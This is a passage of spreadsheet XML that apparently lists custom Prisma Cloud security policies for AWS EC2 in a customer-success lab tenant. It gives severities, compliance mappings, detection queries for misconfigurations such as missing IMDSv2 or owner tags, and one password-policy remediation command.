        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1649" t="inlineStr"/>
      <c r="AD1649" t="b">
        <v>0</v>
      </c>
      <c r="AE1649" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF1649" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG16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49" t="inlineStr">
        <is>
          <t>ccda0440-eb5e-4392-af21-6f833a39fbb4</t>
        </is>
      </c>
      <c r="AI1649" t="inlineStr">
        <is>
          <t>a7dad609-d5e1-4ff0-872f-973cfa6abdab</t>
        </is>
      </c>
      <c r="AJ1649" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1649" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1650">
      <c r="A1650" t="inlineStr">
        <is>
          <t>CIS v1.4.0 (GKE) - Level 2</t>
        </is>
      </c>
      <c r="B1650" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1650" s="2" t="inlineStr"/>
      <c r="D1650" t="inlineStr"/>
      <c r="E1650" t="inlineStr"/>
      <c r="F1650" t="inlineStr"/>
      <c r="G1650" t="b">
        <v>0</v>
      </c>
      <c r="H16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0" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1650" t="inlineStr">
        <is>
          <t>aws-ec2</t>
        </is>
      </c>
      <c r="K1650" t="inlineStr">
        <is>
          <t>vstoyko-policy-00</t>
        </is>
      </c>
      <c r="L1650" t="inlineStr"/>
      <c r="M1650" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N1650" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O1650" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1650" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q1650" t="inlineStr">
        <is>
          <t>Policies</t>
        </is>
      </c>
      <c r="R1650" t="inlineStr">
        <is>
          <t>4.6.2</t>
        </is>
      </c>
      <c r="S1650" t="inlineStr"/>
      <c r="T1650" t="b">
        <v>0</v>
      </c>
      <c r="U1650" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1650" t="inlineStr">
        <is>
          <t>aws-ec2-describe-instances</t>
        </is>
      </c>
      <c r="W1650" t="inlineStr"/>
      <c r="X1650" t="inlineStr"/>
      <c r="Y1650" t="inlineStr"/>
      <c r="Z1650" t="inlineStr">
        <is>
          <t>config from cloud.resource where api.name = 'aws-ec2-describe-instances' AND json.rule = amiLaunchIndex exists</t>
        </is>
      </c>
      <c r="AA1650" t="inlineStr">
        <is>
          <t>Marius Banica</t>
        </is>
      </c>
      <c r="AB1650" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1650" t="inlineStr"/>
      <c r="AD1650" t="b">
        <v>0</v>
      </c>
      <c r="AE1650" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF1650" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG16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0" t="inlineStr">
        <is>
          <t>3a7c4ac8-d549-456d-9ca5-ef323ca8fa8a</t>
        </is>
      </c>
      <c r="AI1650" t="inlineStr">
        <is>
          <t>360129bf-5a5d-4f69-ac01-8eb99da26e58</t>
        </is>
      </c>
      <c r="AJ1650" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1650" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1651">
      <c r="A1651" t="inlineStr">
        <is>
          <t>Copy of Azure Security Benchmark (v3), Azure Security Benchmark (v3)</t>
        </is>
      </c>
      <c r="B1651" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1651" s="2" t="inlineStr"/>
      <c r="D1651" t="inlineStr"/>
      <c r="E1651" t="inlineStr"/>
      <c r="F1651" t="inlineStr"/>
      <c r="G1651" t="b">
        <v>0</v>
      </c>
      <c r="H16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1" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1651" t="inlineStr">
        <is>
          <t>aws-ec2</t>
        </is>
      </c>
      <c r="K1651" t="inlineStr">
        <is>
          <t>okostine-test1</t>
        </is>
      </c>
      <c r="L1651" t="inlineStr"/>
      <c r="M1651" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N1651" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O1651" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1651" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q1651" t="inlineStr">
        <is>
          <t>Identity Management (IM)</t>
        </is>
      </c>
      <c r="R1651" t="inlineStr">
        <is>
          <t>IM-1</t>
        </is>
      </c>
      <c r="S1651" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="T1651" t="b">
        <v>0</v>
      </c>
      <c r="U1651" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1651" t="inlineStr">
        <is>
          <t>aws-ec2-describe-instances</t>
        </is>
      </c>
      <c r="W1651" t="inlineStr"/>
      <c r="X1651" t="inlineStr"/>
      <c r="Y1651" t="inlineStr"/>
      <c r="Z1651" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' AND api.name = 'aws-ec2-describe-instances' AND json.rule = iamInstanceProfile.arn does not exist and state.code equals 16</t>
        </is>
      </c>
      <c r="AA1651" t="inlineStr">
        <is>
          <t>Brandon Goldstein</t>
        </is>
      </c>
      <c r="AB1651" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1651" t="inlineStr"/>
      <c r="AD1651" t="b">
        <v>0</v>
      </c>
      <c r="AE1651" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF1651" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG16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1" t="inlineStr">
        <is>
          <t>ed1b7ad2-48ea-4b38-a861-b1c12f31dec5</t>
        </is>
      </c>
      <c r="AI1651" t="inlineStr">
        <is>
          <t>ee57dd9e-2cba-4290-940c-d7718aaa4cd3</t>
        </is>
      </c>
      <c r="AJ1651" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1651" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1652">
      <c r="A1652" t="inlineStr">
        <is>
          <t>PCS SWAT Standards (SWATS) 1.0 - DO NOT TOUCH</t>
        </is>
      </c>
      <c r="B1652" s="2" t="inlineStr">
        <is>
          <t>REVIEW</t>
        </is>
      </c>
      <c r="C1652" s="2" t="inlineStr"/>
      <c r="D1652" t="n">
        <v>54</v>
      </c>
      <c r="E1652" t="n">
        <v>49</v>
      </c>
      <c r="F1652" t="n">
        <v>92</v>
      </c>
      <c r="G1652" t="b">
        <v>1</v>
      </c>
      <c r="H1652"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2" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1652" t="inlineStr">
        <is>
          <t>aws-ec2</t>
        </is>
      </c>
      <c r="K1652" t="inlineStr">
        <is>
          <t>AWS EC2 3 Days no Owner V6</t>
        </is>
      </c>
      <c r="L1652" t="inlineStr"/>
      <c r="M1652" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N1652" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O1652" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1652" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q1652" t="inlineStr">
        <is>
          <t>5.1 Config</t>
        </is>
      </c>
      <c r="R1652" t="inlineStr">
        <is>
          <t>5.1.3 Config - Compute Resource with No Owner</t>
        </is>
      </c>
      <c r="S1652" t="inlineStr"/>
      <c r="T1652" t="b">
        <v>0</v>
      </c>
      <c r="U1652" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1652" t="inlineStr">
        <is>
          <t>aws-ec2-describe-instances</t>
        </is>
      </c>
      <c r="W1652" t="inlineStr"/>
      <c r="X1652" t="inlineStr"/>
      <c r="Y1652" t="inlineStr"/>
      <c r="Z1652" t="inlineStr">
        <is>
          <t>config from cloud.resource WHERE api.name = 'aws-ec2-describe-instances' AND resource.status = Active AND json.rule = "_DateTime.ageInDays(launchTime) &gt; 3 and tags[*].value none start with prismacloud-scan and tags[*].key does not contain owner and tags[*].key does not contain Owner and tags[*].key none start with aws:autoscaling:groupName" addcolumn _DateTime.ageInDays(launchTime)</t>
        </is>
      </c>
      <c r="AA1652" t="inlineStr">
        <is>
          <t>Adam Hamilton-Sutherland</t>
        </is>
      </c>
      <c r="AB1652" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1652" t="inlineStr"/>
      <c r="AD1652" t="b">
        <v>0</v>
      </c>
      <c r="AE1652" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF1652" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG16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2" t="inlineStr">
        <is>
          <t>4e395187-5a2d-4b07-b6e1-8b1407df9334</t>
        </is>
      </c>
      <c r="AI1652" t="inlineStr">
        <is>
          <t>95c45cae-7b1f-4991-9e45-8081aac9a316</t>
        </is>
      </c>
      <c r="AJ1652" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1652" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1653">
      <c r="A1653" t="inlineStr">
        <is>
          <t>CIS v1.3.0 (AWS)</t>
        </is>
      </c>
      <c r="B1653" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1653" s="2" t="inlineStr"/>
      <c r="D1653" t="inlineStr"/>
      <c r="E1653" t="inlineStr"/>
      <c r="F1653" t="inlineStr"/>
      <c r="G1653" t="b">
        <v>0</v>
      </c>
      <c r="H16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3" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1653" t="inlineStr">
        <is>
          <t>aws-ec2</t>
        </is>
      </c>
      <c r="K1653" t="inlineStr">
        <is>
          <t>test_policy_vstoyko</t>
        </is>
      </c>
      <c r="L1653" t="inlineStr"/>
      <c r="M1653" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N1653" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O1653" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1653" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q1653" t="inlineStr">
        <is>
          <t>Logging</t>
        </is>
      </c>
      <c r="R1653" t="inlineStr">
        <is>
          <t>3.5</t>
        </is>
      </c>
      <c r="S1653" t="inlineStr">
        <is>
          <t>new_label,vstoyko : test</t>
        </is>
      </c>
      <c r="T1653" t="b">
        <v>0</v>
      </c>
      <c r="U1653" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1653" t="inlineStr">
        <is>
          <t>aws-ec2-describe-instances</t>
        </is>
      </c>
      <c r="W1653" t="inlineStr">
        <is>
          <t>New Ec2</t>
        </is>
      </c>
      <c r="X1653" t="inlineStr">
        <is>
          <t>test remedy</t>
        </is>
      </c>
      <c r="Y1653" t="inlineStr"/>
      <c r="Z1653" t="inlineStr">
        <is>
          <t>config from cloud.resource where api.name = 'aws-ec2-describe-instances' AND json.rule = launchTime exists</t>
        </is>
      </c>
      <c r="AA1653" t="inlineStr">
        <is>
          <t>Vitaliy Stoyko</t>
        </is>
      </c>
      <c r="AB1653" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1653" t="inlineStr"/>
      <c r="AD1653" t="b">
        <v>0</v>
      </c>
      <c r="AE1653" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF1653" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG16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3" t="inlineStr">
        <is>
          <t>a1711b53-0f19-4409-b967-05a7a58a3fef</t>
        </is>
      </c>
      <c r="AI1653" t="inlineStr">
        <is>
          <t>16588b52-36ec-47c8-8c23-907b2a8aeae6</t>
        </is>
      </c>
      <c r="AJ1653" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1653" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1654">
      <c r="A1654" t="inlineStr"/>
      <c r="B1654" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C1654" s="2" t="inlineStr"/>
      <c r="D1654" t="inlineStr"/>
      <c r="E1654" t="inlineStr"/>
      <c r="F1654" t="inlineStr"/>
      <c r="G1654" t="b">
        <v>0</v>
      </c>
      <c r="H16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4" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1654" t="inlineStr">
        <is>
          <t>aws-ec2</t>
        </is>
      </c>
      <c r="K1654" t="inlineStr">
        <is>
          <t>Copy of Cloned elevance2</t>
        </is>
      </c>
      <c r="L1654" t="inlineStr"/>
      <c r="M1654" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N1654" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O1654" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P1654" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q1654" t="inlineStr"/>
      <c r="R1654" t="inlineStr"/>
      <c r="S1654" t="inlineStr"/>
      <c r="T1654" t="b">
        <v>0</v>
      </c>
      <c r="U1654" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1654" t="inlineStr">
        <is>
          <t>aws-ec2-describe-instances</t>
        </is>
      </c>
      <c r="W1654" t="inlineStr"/>
      <c r="X1654" t="inlineStr"/>
      <c r="Y1654" t="inlineStr"/>
      <c r="Z1654" t="inlineStr">
        <is>
          <t>asset where asset.type IN ( 'aws-ec2-describe-instances' ) AND finding.name = (('AWS EC2 instance with network path from the internet (0.0.0.0/0)') and ('AWS EC2 Instance IAM Role not enabled' and 'AWS EC2 instance not configured with Instance Metadata Service v2 (IMDSv2)')) AND with : ( Vuln where SEVERITY &gt;= HIGH )</t>
        </is>
      </c>
      <c r="AA1654" t="inlineStr">
        <is>
          <t>Marius Banica</t>
        </is>
      </c>
      <c r="AB1654" t="inlineStr">
        <is>
          <t>2024-09-13 16:49:43</t>
        </is>
      </c>
      <c r="AC1654" t="inlineStr"/>
      <c r="AD1654" t="b">
        <v>0</v>
      </c>
      <c r="AE1654" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF1654" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG16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4" t="inlineStr">
        <is>
          <t>9187f151-a344-4a46-a3b3-0ea0a87be1a3</t>
        </is>
      </c>
      <c r="AI1654" t="inlineStr">
        <is>
          <t>1d22599d-1f47-4082-925c-452d3f3db764</t>
        </is>
      </c>
      <c r="AJ1654" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1654" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1655">
      <c r="A1655" t="inlineStr"/>
      <c r="B1655" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1655" s="2" t="inlineStr"/>
      <c r="D1655" t="inlineStr"/>
      <c r="E1655" t="inlineStr"/>
      <c r="F1655" t="inlineStr"/>
      <c r="G1655" t="b">
        <v>0</v>
      </c>
      <c r="H16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5" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1655" t="inlineStr">
        <is>
          <t>aws-ec2</t>
        </is>
      </c>
      <c r="K1655" t="inlineStr">
        <is>
          <t>New Ec2</t>
        </is>
      </c>
      <c r="L1655" t="inlineStr"/>
      <c r="M1655" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N1655" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O1655" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1655" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q1655" t="inlineStr"/>
      <c r="R1655" t="inlineStr"/>
      <c r="S1655" t="inlineStr"/>
      <c r="T1655" t="b">
        <v>0</v>
      </c>
      <c r="U1655" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1655" t="inlineStr">
        <is>
          <t>aws-ec2-describe-instances</t>
        </is>
      </c>
      <c r="W1655" t="inlineStr">
        <is>
          <t>New Ec2</t>
        </is>
      </c>
      <c r="X1655" t="inlineStr"/>
      <c r="Y1655" t="inlineStr"/>
      <c r="Z1655" t="inlineStr">
        <is>
          <t>config from cloud.resource where api.name = 'aws-ec2-describe-instances' AND json.rule = launchTime exists</t>
        </is>
      </c>
      <c r="AA1655" t="inlineStr">
        <is>
          <t>Bishvesh Pachauli</t>
        </is>
      </c>
      <c r="AB1655" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1655" t="inlineStr"/>
      <c r="AD1655" t="b">
        <v>0</v>
      </c>
      <c r="AE1655" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF1655" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG16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5" t="inlineStr">
        <is>
          <t>968332b9-7548-4f82-8a99-197daded7c50</t>
        </is>
      </c>
      <c r="AI1655" t="inlineStr">
        <is>
          <t>d5faf957-a7a4-450f-8fd4-a1e0ddeda07e</t>
        </is>
      </c>
      <c r="AJ1655" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1655" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1656">
      <c r="A1656" t="inlineStr"/>
      <c r="B1656" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1656" s="2" t="inlineStr"/>
      <c r="D1656" t="inlineStr"/>
      <c r="E1656" t="inlineStr"/>
      <c r="F1656" t="inlineStr"/>
      <c r="G1656" t="b">
        <v>0</v>
      </c>
      <c r="H16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6" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1656" t="inlineStr">
        <is>
          <t>aws-ec2</t>
        </is>
      </c>
      <c r="K1656" t="inlineStr">
        <is>
          <t>Will EC2 public ip add as X</t>
        </is>
      </c>
      <c r="L1656" t="inlineStr"/>
      <c r="M1656" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N1656" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O1656" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1656" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q1656" t="inlineStr"/>
      <c r="R1656" t="inlineStr"/>
      <c r="S1656" t="inlineStr"/>
      <c r="T1656" t="b">
        <v>0</v>
      </c>
      <c r="U1656" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1656" t="inlineStr">
        <is>
          <t>aws-ec2-describe-instances</t>
        </is>
      </c>
      <c r="W1656" t="inlineStr">
        <is>
          <t>Will EC2 public ip add as X</t>
        </is>
      </c>
      <c r="X1656" t="inlineStr"/>
      <c r="Y1656" t="inlineStr"/>
      <c r="Z1656" t="inlineStr">
        <is>
          <t>config from cloud.resource where api.name = 'aws-ec2-describe-instances' and json.rule = publicIpAddress exists and publicIpAddress is not empty as X;</t>
        </is>
      </c>
      <c r="AA1656" t="inlineStr">
        <is>
          <t>Brandon Goldstein</t>
        </is>
      </c>
      <c r="AB1656" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1656" t="inlineStr"/>
      <c r="AD1656" t="b">
        <v>0</v>
      </c>
      <c r="AE1656" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF1656" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG16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6" t="inlineStr">
        <is>
          <t>5e89a028-f3d0-4b61-900e-d7f51f5d2135</t>
        </is>
      </c>
      <c r="AI1656" t="inlineStr">
        <is>
          <t>e45f0503-53d2-4349-9050-c4940523b59a</t>
        </is>
      </c>
      <c r="AJ1656" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1656" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1657">
      <c r="A1657" t="inlineStr"/>
      <c r="B1657" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C1657" s="2" t="inlineStr"/>
      <c r="D1657" t="n">
        <v>16</v>
      </c>
      <c r="E1657" t="n">
        <v>78</v>
      </c>
      <c r="F1657" t="n">
        <v>0</v>
      </c>
      <c r="G1657" t="b">
        <v>1</v>
      </c>
      <c r="H16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57" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1657" t="inlineStr">
        <is>
          <t>aws-ec2</t>
        </is>
      </c>
      <c r="K1657" t="inlineStr">
        <is>
          <t>Demo : Vulnerable AWS EC2 instance not configured with Metadata Service v2 (IMDSv2)</t>
        </is>
      </c>
      <c r="L1657" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M1657" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N1657" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O1657" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P1657" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q1657" t="inlineStr"/>
      <c r="R1657" t="inlineStr"/>
      <c r="S1657" t="inlineStr"/>
      <c r="T1657" t="b">
        <v>0</v>
      </c>
      <c r="U1657" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1657" t="inlineStr">
        <is>
          <t>aws-ec2-describe-instances</t>
        </is>
      </c>
      <c r="W1657" t="inlineStr"/>
      <c r="X1657" t="inlineStr"/>
      <c r="Y1657" t="inlineStr"/>
      <c r="Z1657" t="inlineStr">
        <is>
          <t>asset where asset.type IN ( 'aws-ec2-describe-instances' ) AND finding.name contains all ('AWS EC2 instance not configured with Instance Metadata Service v2 (IMDSv2)')</t>
        </is>
      </c>
      <c r="AA1657" t="inlineStr">
        <is>
          <t>Muhammad Rehan</t>
        </is>
      </c>
      <c r="AB1657" t="inlineStr">
        <is>
          <t>2024-10-30 21:28:21</t>
        </is>
      </c>
      <c r="AC1657" t="inlineStr"/>
      <c r="AD1657" t="b">
        <v>0</v>
      </c>
      <c r="AE1657" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF1657" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG16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57" t="inlineStr">
        <is>
          <t>23c93280-98d2-45a4-bf1c-88bc3afb93d4</t>
        </is>
      </c>
      <c r="AI1657" t="inlineStr">
        <is>
          <t>8a3f00e4-7aef-482a-9ab6-f8d147f351de</t>
        </is>
      </c>
      <c r="AJ1657" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1657" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1658">
      <c r="A1658" t="inlineStr"/>
      <c r="B1658" s="2" t="inlineStr">
        <is>
          <t>REVIEW</t>
        </is>
      </c>
      <c r="C1658" s="2" t="inlineStr"/>
      <c r="D1658" t="n">
        <v>2237</v>
      </c>
      <c r="E1658" t="n">
        <v>138</v>
      </c>
      <c r="F1658" t="n">
        <v>2</v>
      </c>
      <c r="G1658" t="b">
        <v>1</v>
      </c>
      <c r="H16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58" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1658" t="inlineStr">
        <is>
          <t>aws-ec2</t>
        </is>
      </c>
      <c r="K1658" t="inlineStr">
        <is>
          <t>build-terraform-123</t>
        </is>
      </c>
      <c r="L1658" t="inlineStr"/>
      <c r="M1658" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N1658" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O1658" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1658" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q1658" t="inlineStr"/>
      <c r="R1658" t="inlineStr"/>
      <c r="S1658" t="inlineStr"/>
      <c r="T1658" t="b">
        <v>1</v>
      </c>
      <c r="U1658" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1658" t="inlineStr">
        <is>
          <t>aws-ec2-describe-instances</t>
        </is>
      </c>
      <c r="W1658" t="inlineStr"/>
      <c r="X1658" t="inlineStr">
        <is>
          <t>Build Recommendation: fix it
IaC: fix it</t>
        </is>
      </c>
      <c r="Y1658" t="inlineStr">
        <is>
          <t>'description': "This CLI command requires 'iam:UpdateAccountPasswordPolicy' permission. Successful execution will update the password policy to set the minimum password length to 14,
require lowercase,
uppercase,
symbol,
allow users to reset password,
cannot reuse the last 24 passwords and password expiration to 90 days.",
'cliScriptTemplate': 'aws iam update-account-password-policy --minimum-password-length 14 --require-uppercase-characters --require-lowercase-characters --require-numbers --require-symbols --allow-users-to-change-password --password-reuse-prevention 24 --max-password-age 90'</t>
        </is>
      </c>
      <c r="Z1658" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' AND api.name = 'aws-ec2-describe-instances' AND json.rule =  iamInstanceProfile.arn does not exist and state.code equals 16</t>
        </is>
      </c>
      <c r="AA1658" t="inlineStr">
        <is>
          <t>Adam Hamilton-Sutherland</t>
        </is>
      </c>
      <c r="AB1658" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1658" t="inlineStr"/>
      <c r="AD1658" t="b">
        <v>0</v>
      </c>
      <c r="AE1658" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF1658" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG16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58" t="inlineStr">
        <is>
          <t>12818993-b03b-4c2b-af59-b5e3503daeb0</t>
        </is>
      </c>
      <c r="AI1658" t="inlineStr">
        <is>
          <t>59b37ce0-2c63-4493-a588-bb46cdc371c5</t>
        </is>
      </c>
      <c r="AJ1658" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1658" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1659">
      <c r="A1659" t="inlineStr"/>
      <c r="B1659" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1659" s="2" t="inlineStr"/>
      <c r="D1659" t="inlineStr"/>
      <c r="E1659" t="inlineStr"/>
      <c r="F1659" t="inlineStr"/>
      <c r="G1659" t="b">
        <v>0</v>
      </c>
      <c r="H16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59" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1659" t="inlineStr">
        <is>
          <t>aws-ec2</t>
        </is>
      </c>
      <c r="K1659" t="inlineStr">
        <is>
          <t>AWS EC2 7 Days Old - No Owner Tag (v2)</t>
        </is>
      </c>
      <c r="L1659" t="inlineStr"/>
      <c r="M1659" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N1659" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O1659" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1659" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q1659" t="inlineStr"/>
      <c r="R1659" t="inlineStr"/>
      <c r="S1659" t="inlineStr"/>
      <c r="T1659" t="b">
        <v>0</v>
      </c>
      <c r="U1659" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1659" t="inlineStr">
        <is>
          <t>aws-ec2-describe-instances</t>
        </is>
      </c>
      <c r="W1659" t="inlineStr"/>
      <c r="X1659" t="inlineStr"/>
      <c r="Y1659" t="inlineStr"/>
      <c r="Z1659" t="inlineStr">
        <is>
